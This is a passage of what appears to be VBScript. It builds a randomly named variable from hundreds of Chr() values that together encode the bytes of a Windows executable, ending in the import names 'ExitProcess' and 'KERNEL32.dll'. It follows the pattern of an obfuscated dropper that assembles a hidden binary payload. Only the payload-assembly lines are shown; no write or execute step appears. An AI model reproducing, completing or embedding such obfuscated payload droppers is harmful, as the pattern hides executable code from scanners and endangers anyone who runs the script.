wvWPLP=wvWPLP&Chr(181)&Chr(113)&Chr(230)&Chr(145)&Chr(64)&Chr(197)&Chr(117)&Chr(181)&Chr(84)&Chr(209)&Chr(226)&Chr(22)&Chr(146)&Chr(89)&Chr(182)&Chr(6)&Chr(159)&Chr(250)&Chr(138)&Chr(80)&Chr(88)&Chr(231)&Chr(63)&Chr(80)&Chr(19)&Chr(249)&Chr(241)&Chr(180)&Chr(163)&Chr(87)&Chr(160)&Chr(206)&Chr(88)&Chr(118)&Chr(15)&Chr(196)&Chr(168)&Chr(193)&Chr(92)&Chr(182)&Chr(156)&Chr(79)&Chr(137)&Chr(155)&Chr(162)&Chr(112)&Chr(132)&Chr(228)&Chr(93)&Chr(57)&Chr(205)&Chr(40)&Chr(83)&Chr(234)&Chr(153)&Chr(214)&Chr(185)&Chr(255)&Chr(40)&Chr(170)&Chr(102)&Chr(49)&Chr(253)&Chr(129)&Chr(54)&Chr(195)&Chr(192)&Chr(123)&Chr(196)&Chr(121)&Chr(5)&Chr(91)&Chr(154)&Chr(73)&Chr(79)&Chr(37)&Chr(106)&Chr(11)&Chr(60)&Chr(72)&Chr(251)&Chr(100)&Chr(98)&Chr(3)&Chr(56)&Chr(251)&Chr(4)&Chr(37)&Chr(160)&Chr(40)&Chr(111)&Chr(81)&Chr(137)&Chr(79)&Chr(81)&Chr(6)&Chr(104)&Chr(204)&Chr(47)&Chr(19)
wvWPLP=wvWPLP&Chr(119)&Chr(185)&Chr(209)&Chr(225)&Chr(5)&Chr(207)&Chr(38)&Chr(120)&Chr(90)&Chr(243)&Chr(192)&Chr(188)&Chr(184)&Chr(12)&Chr(211)&Chr(233)&Chr(138)&Chr(157)&Chr(7)&Chr(7)&Chr(247)&Chr(71)&Chr(242)&Chr(253)&Chr(193)&Chr(236)&Chr(83)&Chr(169)&Chr(8)&Chr(31)&Chr(19)&Chr(85)&Chr(249)&Chr(32)&Chr(221)&Chr(134)&Chr(88)&Chr(76)&Chr(185)&Chr(82)&Chr(126)&Chr(166)&Chr(49)&Chr(125)&Chr(50)&Chr(164)&Chr(97)&Chr(141)&Chr(82)&Chr(179)&Chr(79)&Chr(254)&Chr(133)&Chr(105)&Chr(99)&Chr(238)&Chr(47)&Chr(150)&Chr(84)&Chr(114)&Chr(179)&Chr(144)&Chr(42)&Chr(78)&Chr(125)&Chr(145)&Chr(157)&Chr(43)&Chr(86)&Chr(225)&Chr(19)&Chr(82)&Chr(186)&Chr(176)&Chr(116)&Chr(56)&Chr(163)&Chr(216)&Chr(119)&Chr(196)&Chr(186)&Chr(220)&Chr(25)&Chr(75)&Chr(58)&Chr(9)&Chr(185)&Chr(14)&Chr(121)&Chr(108)&Chr(135)&Chr(225)&Chr(20)&Chr(200)&Chr(56)&Chr(35)&Chr(148)&Chr(98)&Chr(185)&Chr(127)
wvWPLP=wvWPLP&Chr(128)&Chr(248)&Chr(252)&Chr(151)&Chr(64)&Chr(193)&Chr(62)&Chr(250)&Chr(184)&Chr(148)&Chr(155)&Chr(168)&Chr(67)&Chr(245)&Chr(156)&Chr(43)&Chr(36)&Chr(152)&Chr(38)&Chr(53)&Chr(167)&Chr(31)&Chr(79)&Chr(254)&Chr(229)&Chr(134)&Chr(175)&Chr(48)&Chr(196)&Chr(3)&Chr(225)&Chr(33)&Chr(90)&Chr(168)&Chr(73)&Chr(52)&Chr(128)&Chr(184)&Chr(120)&Chr(191)&Chr(238)&Chr(234)&Chr(53)&Chr(14)&Chr(107)&Chr(171)&Chr(231)&Chr(3)&Chr(152)&Chr(251)&Chr(113)&Chr(21)&Chr(39)&Chr(88)&Chr(32)&Chr(44)&Chr(81)&Chr(205)&Chr(126)&Chr(187)&Chr(180)&Chr(179)&Chr(135)&Chr(87)&Chr(56)&Chr(182)&Chr(235)&Chr(128)&Chr(51)&Chr(84)&Chr(231)&Chr(190)&Chr(55)&Chr(131)&Chr(254)&Chr(4)&Chr(243)&Chr(220)&Chr(173)&Chr(254)&Chr(251)&Chr(40)&Chr(129)&Chr(31)&Chr(249)&Chr(49)&Chr(87)&Chr(186)&Chr(161)&Chr(24)&Chr(92)&Chr(3)&Chr(35)&Chr(52)&Chr(92)&Chr(40)&Chr(20)&Chr(159)&Chr(73)&Chr(41)
wvWPLP=wvWPLP&Chr(6)&Chr(60)&Chr(9)&Chr(199)&Chr(142)&Chr(103)&Chr(36)&Chr(25)&Chr(138)&Chr(66)&Chr(169)&Chr(52)&Chr(86)&Chr(99)&Chr(192)&Chr(51)&Chr(89)&Chr(32)&Chr(192)&Chr(228)&Chr(149)&Chr(3)&Chr(13)&Chr(29)&Chr(54)&Chr(213)&Chr(197)&Chr(83)&Chr(61)&Chr(147)&Chr(187)&Chr(196)&Chr(6)&Chr(201)&Chr(16)&Chr(103)&Chr(62)&Chr(147)&Chr(48)&Chr(189)&Chr(222)&Chr(63)&Chr(28)&Chr(18)&Chr(25)&Chr(86)&Chr(160)&Chr(151)&Chr(160)&Chr(212)&Chr(18)&Chr(37)&Chr(161)&Chr(231)&Chr(159)&Chr(39)&Chr(134)&Chr(206)&Chr(84)&Chr(36)&Chr(206)&Chr(135)&Chr(166)&Chr(192)&Chr(1)&Chr(78)&Chr(26)&Chr(101)&Chr(254)&Chr(49)&Chr(53)&Chr(34)&Chr(73)&Chr(211)&Chr(150)&Chr(22)&Chr(116)&Chr(97)&Chr(80)&Chr(205)&Chr(168)&Chr(44)&Chr(99)&Chr(185)&Chr(206)&Chr(44)&Chr(7)&Chr(50)&Chr(105)&Chr(234)&Chr(9)&Chr(6)&Chr(13)&Chr(107)&Chr(123)&Chr(216)&Chr(183)&Chr(39)&Chr(159)&Chr(253)
wvWPLP=wvWPLP&Chr(107)&Chr(117)&Chr(167)&Chr(122)&Chr(25)&Chr(197)&Chr(171)&Chr(250)&Chr(180)&Chr(18)&Chr(16)&Chr(117)&Chr(252)&Chr(76)&Chr(17)&Chr(70)&Chr(42)&Chr(112)&Chr(19)&Chr(131)&Chr(252)&Chr(38)&Chr(79)&Chr(0)&Chr(193)&Chr(56)&Chr(101)&Chr(50)&Chr(240)&Chr(107)&Chr(146)&Chr(129)&Chr(164)&Chr(131)&Chr(39)&Chr(117)&Chr(231)&Chr(7)&Chr(208)&Chr(241)&Chr(90)&Chr(211)&Chr(34)&Chr(106)&Chr(39)&Chr(72)&Chr(92)&Chr(28)&Chr(227)&Chr(169)&Chr(229)&Chr(235)&Chr(183)&Chr(241)&Chr(228)&Chr(186)&Chr(191)&Chr(12)&Chr(151)&Chr(52)&Chr(104)&Chr(161)&Chr(84)&Chr(47)&Chr(169)&Chr(236)&Chr(7)&Chr(90)&Chr(193)&Chr(65)&Chr(191)&Chr(87)&Chr(206)&Chr(214)&Chr(57)&Chr(159)&Chr(72)&Chr(48)&Chr(185)&Chr(149)&Chr(4)&Chr(107)&Chr(46)&Chr(228)&Chr(81)&Chr(110)&Chr(57)&Chr(2)&Chr(232)&Chr(164)&Chr(133)&Chr(117)&Chr(61)&Chr(232)&Chr(11)&Chr(39)&Chr(77)&Chr(198)&Chr(86)&Chr(155)
wvWPLP=wvWPLP&Chr(248)&Chr(225)&Chr(226)&Chr(157)&Chr(141)&Chr(189)&Chr(100)&Chr(198)&Chr(133)&Chr(227)&Chr(84)&Chr(157)&Chr(36)&Chr(7)&Chr(127)&Chr(245)&Chr(187)&Chr(173)&Chr(4)&Chr(96)&Chr(115)&Chr(91)&Chr(214)&Chr(203)&Chr(173)&Chr(147)&Chr(96)&Chr(25)&Chr(22)&Chr(241)&Chr(41)&Chr(134)&Chr(159)&Chr(250)&Chr(226)&Chr(218)&Chr(196)&Chr(87)&Chr(127)&Chr(98)&Chr(29)&Chr(19)&Chr(126)&Chr(15)&Chr(119)&Chr(223)&Chr(233)&Chr(64)&Chr(56)&Chr(21)&Chr(70)&Chr(198)&Chr(226)&Chr(24)&Chr(178)&Chr(137)&Chr(196)&Chr(8)&Chr(94)&Chr(26)&Chr(157)&Chr(163)&Chr(81)&Chr(187)&Chr(199)&Chr(144)&Chr(249)&Chr(4)&Chr(247)&Chr(115)&Chr(137)&Chr(57)&Chr(147)&Chr(8)&Chr(45)&Chr(223)&Chr(39)&Chr(221)&Chr(59)&Chr(57)&Chr(238)&Chr(181)&Chr(145)&Chr(170)&Chr(190)&Chr(173)&Chr(228)&Chr(65)&Chr(204)&Chr(60)&Chr(149)&Chr(29)&Chr(249)&Chr(51)&Chr(14)&Chr(74)&Chr(234)&Chr(91)&Chr(23)&Chr(78)
wvWPLP=wvWPLP&Chr(18)&Chr(239)&Chr(113)&Chr(143)&Chr(166)&Chr(5)&Chr(53)&Chr(20)&Chr(94)&Chr(109)&Chr(198)&Chr(249)&Chr(82)&Chr(110)&Chr(250)&Chr(44)&Chr(26)&Chr(19)&Chr(152)&Chr(6)&Chr(35)&Chr(255)&Chr(212)&Chr(24)&Chr(110)&Chr(151)&Chr(61)&Chr(88)&Chr(80)&Chr(204)&Chr(142)&Chr(27)&Chr(51)&Chr(101)&Chr(1)&Chr(239)&Chr(29)&Chr(83)&Chr(52)&Chr(39)&Chr(68)&Chr(164)&Chr(222)&Chr(69)&Chr(22)&Chr(25)&Chr(244)&Chr(75)&Chr(201)&Chr(239)&Chr(45)&Chr(168)&Chr(145)&Chr(112)&Chr(31)&Chr(191)&Chr(227)&Chr(11)&Chr(59)&Chr(190)&Chr(231)&Chr(87)&Chr(128)&Chr(87)&Chr(26)&Chr(109)&Chr(67)&Chr(60)&Chr(192)&Chr(184)&Chr(89)&Chr(77)&Chr(236)&Chr(188)&Chr(193)&Chr(15)&Chr(14)&Chr(233)&Chr(72)&Chr(74)&Chr(34)&Chr(249)&Chr(7)&Chr(12)&Chr(245)&Chr(12)&Chr(83)&Chr(138)&Chr(90)&Chr(120)&Chr(95)&Chr(132)&Chr(139)&Chr(149)&Chr(241)&Chr(122)&Chr(72)&Chr(195)&Chr(231)&Chr(214)
wvWPLP=wvWPLP&Chr(23)&Chr(53)&Chr(104)&Chr(181)&Chr(203)&Chr(43)&Chr(45)&Chr(234)&Chr(211)&Chr(94)&Chr(103)&Chr(155)&Chr(117)&Chr(25)&Chr(104)&Chr(129)&Chr(140)&Chr(132)&Chr(249)&Chr(15)&Chr(35)&Chr(98)&Chr(151)&Chr(135)&Chr(164)&Chr(88)&Chr(15)&Chr(68)&Chr(21)&Chr(2)&Chr(95)&Chr(113)&Chr(82)&Chr(229)&Chr(135)&Chr(82)&Chr(173)&Chr(58)&Chr(247)&Chr(233)&Chr(185)&Chr(137)&Chr(98)&Chr(128)&Chr(162)&Chr(240)&Chr(161)&Chr(118)&Chr(121)&Chr(198)&Chr(11)&Chr(167)&Chr(236)&Chr(64)&Chr(0)&Chr(182)&Chr(118)&Chr(206)&Chr(195)&Chr(85)&Chr(93)&Chr(165)&Chr(210)&Chr(250)&Chr(232)&Chr(43)&Chr(99)&Chr(120)&Chr(64)&Chr(34)&Chr(131)&Chr(133)&Chr(179)&Chr(149)&Chr(202)&Chr(143)&Chr(96)&Chr(254)&Chr(217)&Chr(238)&Chr(173)&Chr(118)&Chr(246)&Chr(87)&Chr(65)&Chr(44)&Chr(80)&Chr(250)&Chr(235)&Chr(45)&Chr(207)&Chr(86)&Chr(216)&Chr(11)&Chr(16)&Chr(125)&Chr(155)&Chr(209)&Chr(11)&Chr(99)
wvWPLP=wvWPLP&Chr(6)&Chr(232)&Chr(31)&Chr(239)&Chr(232)&Chr(15)&Chr(64)&Chr(12)&Chr(219)&Chr(167)&Chr(185)&Chr(172)&Chr(162)&Chr(86)&Chr(28)&Chr(98)&Chr(4)&Chr(245)&Chr(20)&Chr(152)&Chr(31)&Chr(126)&Chr(204)&Chr(227)&Chr(205)&Chr(154)&Chr(245)&Chr(240)&Chr(224)&Chr(161)&Chr(237)&Chr(131)&Chr(51)&Chr(180)&Chr(125)&Chr(60)&Chr(107)&Chr(70)&Chr(125)&Chr(49)&Chr(233)&Chr(156)&Chr(81)&Chr(8)&Chr(168)&Chr(175)&Chr(181)&Chr(73)&Chr(43)&Chr(81)&Chr(238)&Chr(17)&Chr(235)&Chr(49)&Chr(85)&Chr(144)&Chr(40)&Chr(228)&Chr(191)&Chr(76)&Chr(247)&Chr(226)&Chr(43)&Chr(197)&Chr(255)&Chr(239)&Chr(197)&Chr(74)&Chr(73)&Chr(185)&Chr(103)&Chr(46)&Chr(6)&Chr(208)&Chr(249)&Chr(101)&Chr(57)&Chr(179)&Chr(95)&Chr(80)&Chr(64)&Chr(106)&Chr(58)&Chr(103)&Chr(166)&Chr(76)&Chr(151)&Chr(64)&Chr(138)&Chr(186)&Chr(165)&Chr(207)&Chr(116)&Chr(223)&Chr(148)&Chr(112)&Chr(75)&Chr(9)&Chr(53)&Chr(216)
wvWPLP=wvWPLP&Chr(164)&Chr(146)&Chr(37)&Chr(178)&Chr(157)&Chr(197)&Chr(99)&Chr(142)&Chr(129)&Chr(132)&Chr(76)&Chr(142)&Chr(53)&Chr(49)&Chr(218)&Chr(62)&Chr(248)&Chr(102)&Chr(117)&Chr(91)&Chr(17)&Chr(110)&Chr(172)&Chr(238)&Chr(48)&Chr(214)&Chr(233)&Chr(200)&Chr(84)&Chr(190)&Chr(225)&Chr(179)&Chr(125)&Chr(142)&Chr(113)&Chr(250)&Chr(109)&Chr(253)&Chr(90)&Chr(145)&Chr(29)&Chr(42)&Chr(52)&Chr(64)&Chr(26)&Chr(8)&Chr(91)&Chr(149)&Chr(112)&Chr(218)&Chr(137)&Chr(2)&Chr(30)&Chr(159)&Chr(65)&Chr(190)&Chr(24)&Chr(106)&Chr(208)&Chr(211)&Chr(139)&Chr(97)&Chr(145)&Chr(173)&Chr(174)&Chr(229)&Chr(140)&Chr(140)&Chr(118)&Chr(44)&Chr(64)&Chr(17)&Chr(176)&Chr(128)&Chr(54)&Chr(112)&Chr(253)&Chr(120)&Chr(49)&Chr(80)&Chr(135)&Chr(23)&Chr(67)&Chr(212)&Chr(3)&Chr(253)&Chr(108)&Chr(200)&Chr(147)&Chr(132)&Chr(50)&Chr(147)&Chr(22)&Chr(111)&Chr(192)&Chr(42)&Chr(149)&Chr(198)&Chr(161)&Chr(21)
wvWPLP=wvWPLP&Chr(112)&Chr(92)&Chr(121)&Chr(102)&Chr(22)&Chr(122)&Chr(244)&Chr(161)&Chr(193)&Chr(245)&Chr(31)&Chr(229)&Chr(206)&Chr(45)&Chr(47)&Chr(128)&Chr(147)&Chr(197)&Chr(186)&Chr(127)&Chr(197)&Chr(183)&Chr(251)&Chr(218)&Chr(2)&Chr(138)&Chr(144)&Chr(85)&Chr(154)&Chr(13)&Chr(60)&Chr(120)&Chr(158)&Chr(224)&Chr(113)&Chr(175)&Chr(113)&Chr(143)&Chr(153)&Chr(27)&Chr(233)&Chr(85)&Chr(140)&Chr(202)&Chr(3)&Chr(237)&Chr(54)&Chr(241)&Chr(224)&Chr(140)&Chr(158)&Chr(80)&Chr(221)&Chr(105)&Chr(50)&Chr(171)&Chr(179)&Chr(93)&Chr(108)&Chr(134)&Chr(110)&Chr(185)&Chr(242)&Chr(102)&Chr(27)&Chr(16)&Chr(113)&Chr(182)&Chr(192)&Chr(220)&Chr(155)&Chr(77)&Chr(118)&Chr(44)&Chr(100)&Chr(82)&Chr(44)&Chr(128)&Chr(78)&Chr(53)&Chr(24)&Chr(216)&Chr(176)&Chr(136)&Chr(45)&Chr(19)&Chr(72)&Chr(127)&Chr(7)&Chr(55)&Chr(236)&Chr(113)&Chr(111)&Chr(63)&Chr(255)&Chr(142)&Chr(250)&Chr(172)&Chr(137)&Chr(14)
wvWPLP=wvWPLP&Chr(71)&Chr(157)&Chr(93)&Chr(205)&Chr(73)&Chr(131)&Chr(24)&Chr(15)&Chr(184)&Chr(121)&Chr(1)&Chr(140)&Chr(128)&Chr(130)&Chr(209)&Chr(37)&Chr(193)&Chr(109)&Chr(5)&Chr(141)&Chr(41)&Chr(234)&Chr(3)&Chr(146)&Chr(204)&Chr(61)&Chr(0)&Chr(105)&Chr(214)&Chr(34)&Chr(96)&Chr(204)&Chr(175)&Chr(24)&Chr(228)&Chr(150)&Chr(159)&Chr(106)&Chr(133)&Chr(149)&Chr(30)&Chr(253)&Chr(229)&Chr(189)&Chr(217)&Chr(176)&Chr(121)&Chr(77)&Chr(19)&Chr(195)&Chr(138)&Chr(155)&Chr(36)&Chr(4)&Chr(20)&Chr(81)&Chr(152)&Chr(168)&Chr(17)&Chr(120)&Chr(237)&Chr(68)&Chr(109)&Chr(174)&Chr(252)&Chr(244)&Chr(105)&Chr(221)&Chr(214)&Chr(55)&Chr(124)&Chr(236)&Chr(225)&Chr(76)&Chr(33)&Chr(116)&Chr(247)&Chr(42)&Chr(81)&Chr(61)&Chr(250)&Chr(199)&Chr(24)&Chr(170)&Chr(72)&Chr(191)&Chr(241)&Chr(7)&Chr(195)&Chr(246)&Chr(77)&Chr(234)&Chr(137)&Chr(94)&Chr(114)&Chr(189)&Chr(31)&Chr(226)&Chr(27)&Chr(191)
wvWPLP=wvWPLP&Chr(42)&Chr(245)&Chr(129)&Chr(134)&Chr(220)&Chr(21)&Chr(123)&Chr(182)&Chr(127)&Chr(219)&Chr(228)&Chr(119)&Chr(255)&Chr(117)&Chr(129)&Chr(239)&Chr(166)&Chr(134)&Chr(217)&Chr(209)&Chr(152)&Chr(76)&Chr(141)&Chr(215)&Chr(91)&Chr(19)&Chr(168)&Chr(26)&Chr(18)&Chr(232)&Chr(214)&Chr(33)&Chr(38)&Chr(125)&Chr(42)&Chr(212)&Chr(122)&Chr(73)&Chr(63)&Chr(114)&Chr(57)&Chr(78)&Chr(28)&Chr(109)&Chr(99)&Chr(225)&Chr(64)&Chr(76)&Chr(182)&Chr(124)&Chr(193)&Chr(63)&Chr(235)&Chr(58)&Chr(174)&Chr(249)&Chr(71)&Chr(63)&Chr(248)&Chr(27)&Chr(130)&Chr(208)&Chr(192)&Chr(34)&Chr(151)&Chr(175)&Chr(199)&Chr(188)&Chr(109)&Chr(182)&Chr(128)&Chr(243)&Chr(33)&Chr(227)&Chr(207)&Chr(2)&Chr(71)&Chr(121)&Chr(185)&Chr(156)&Chr(227)&Chr(230)&Chr(70)&Chr(61)&Chr(75)&Chr(78)&Chr(101)&Chr(225)&Chr(189)&Chr(92)&Chr(170)&Chr(39)&Chr(86)&Chr(205)&Chr(221)&Chr(112)&Chr(48)&Chr(160)&Chr(14)&Chr(246)
wvWPLP=wvWPLP&Chr(164)&Chr(137)&Chr(252)&Chr(103)&Chr(127)&Chr(18)&Chr(224)&Chr(86)&Chr(19)&Chr(251)&Chr(60)&Chr(165)&Chr(38)&Chr(148)&Chr(60)&Chr(116)&Chr(145)&Chr(133)&Chr(66)&Chr(179)&Chr(198)&Chr(204)&Chr(83)&Chr(235)&Chr(129)&Chr(188)&Chr(8)&Chr(235)&Chr(121)&Chr(254)&Chr(109)&Chr(210)&Chr(12)&Chr(29)&Chr(83)&Chr(0)&Chr(110)&Chr(240)&Chr(248)&Chr(35)&Chr(171)&Chr(253)&Chr(136)&Chr(35)&Chr(30)&Chr(117)&Chr(2)&Chr(197)&Chr(90)&Chr(44)&Chr(6)&Chr(159)&Chr(55)&Chr(38)&Chr(84)&Chr(152)&Chr(180)&Chr(231)&Chr(212)&Chr(174)&Chr(237)&Chr(141)&Chr(205)&Chr(34)&Chr(48)&Chr(129)&Chr(142)&Chr(78)&Chr(141)&Chr(238)&Chr(228)&Chr(174)&Chr(236)&Chr(152)&Chr(149)&Chr(157)&Chr(232)&Chr(192)&Chr(5)&Chr(66)&Chr(219)&Chr(50)&Chr(127)&Chr(34)&Chr(129)&Chr(159)&Chr(240)&Chr(224)&Chr(73)&Chr(232)&Chr(93)&Chr(184)&Chr(126)&Chr(142)&Chr(32)&Chr(72)&Chr(232)&Chr(145)&Chr(30)&Chr(168)
wvWPLP=wvWPLP&Chr(190)&Chr(97)&Chr(246)&Chr(225)&Chr(190)&Chr(213)&Chr(196)&Chr(255)&Chr(19)&Chr(111)&Chr(174)&Chr(76)&Chr(239)&Chr(119)&Chr(60)&Chr(16)&Chr(153)&Chr(247)&Chr(46)&Chr(239)&Chr(107)&Chr(95)&Chr(98)&Chr(157)&Chr(27)&Chr(45)&Chr(44)&Chr(63)&Chr(121)&Chr(138)&Chr(166)&Chr(241)&Chr(188)&Chr(173)&Chr(37)&Chr(221)&Chr(26)&Chr(31)&Chr(84)&Chr(238)&Chr(157)&Chr(199)&Chr(120)&Chr(91)&Chr(225)&Chr(5)&Chr(31)&Chr(10)&Chr(219)&Chr(204)&Chr(108)&Chr(155)&Chr(127)&Chr(39)&Chr(88)&Chr(134)&Chr(129)&Chr(19)&Chr(194)&Chr(11)&Chr(240)&Chr(249)&Chr(170)&Chr(241)&Chr(5)&Chr(14)&Chr(129)&Chr(194)&Chr(252)&Chr(200)&Chr(217)&Chr(159)&Chr(63)&Chr(87)&Chr(184)&Chr(192)&Chr(228)&Chr(228)&Chr(92)&Chr(81)&Chr(6)&Chr(134)&Chr(75)&Chr(100)&Chr(5)&Chr(82)&Chr(190)&Chr(9)&Chr(56)&Chr(57)&Chr(39)&Chr(216)&Chr(46)&Chr(196)&Chr(16)&Chr(98)&Chr(254)&Chr(202)&Chr(198)&Chr(152)
wvWPLP=wvWPLP&Chr(9)&Chr(50)&Chr(127)&Chr(59)&Chr(110)&Chr(116)&Chr(183)&Chr(217)&Chr(156)&Chr(18)&Chr(89)&Chr(31)&Chr(125)&Chr(213)&Chr(50)&Chr(7)&Chr(101)&Chr(198)&Chr(100)&Chr(74)&Chr(76)&Chr(70)&Chr(58)&Chr(103)&Chr(176)&Chr(46)&Chr(200)&Chr(249)&Chr(201)&Chr(97)&Chr(164)&Chr(16)&Chr(103)&Chr(74)&Chr(228)&Chr(3)&Chr(9)&Chr(79)&Chr(242)&Chr(107)&Chr(170)&Chr(26)&Chr(33)&Chr(146)&Chr(233)&Chr(7)&Chr(60)&Chr(46)&Chr(65)&Chr(90)&Chr(221)&Chr(46)&Chr(219)&Chr(44)&Chr(179)&Chr(172)&Chr(3)&Chr(249)&Chr(141)&Chr(189)&Chr(39)&Chr(111)&Chr(247)&Chr(61)&Chr(0)&Chr(117)&Chr(231)&Chr(102)&Chr(220)&Chr(153)&Chr(159)&Chr(202)&Chr(12)&Chr(128)&Chr(217)&Chr(19)&Chr(192)&Chr(92)&Chr(69)&Chr(208)&Chr(147)&Chr(207)&Chr(9)&Chr(179)&Chr(79)&Chr(241)&Chr(130)&Chr(183)&Chr(33)&Chr(13)&Chr(18)&Chr(100)&Chr(7)&Chr(172)&Chr(167)&Chr(181)&Chr(71)&Chr(206)&Chr(4)&Chr(107)
wvWPLP=wvWPLP&Chr(68)&Chr(128)&Chr(22)&Chr(254)&Chr(150)&Chr(203)&Chr(239)&Chr(109)&Chr(183)&Chr(45)&Chr(227)&Chr(28)&Chr(107)&Chr(108)&Chr(162)&Chr(91)&Chr(89)&Chr(226)&Chr(74)&Chr(50)&Chr(23)&Chr(245)&Chr(117)&Chr(198)&Chr(197)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(44)&Chr(48)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(84)&Chr(48)&Chr(0)&Chr(0)&Chr(56)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(156)&Chr(0)&Chr(69)&Chr(120)&Chr(105)&Chr(116)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(75)&Chr(69)&Chr(82)&Chr(78)&Chr(69)&Chr(76)&Chr(51)&Chr(50)&Chr(46)&Chr(100)&Chr(108)&Chr(108)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
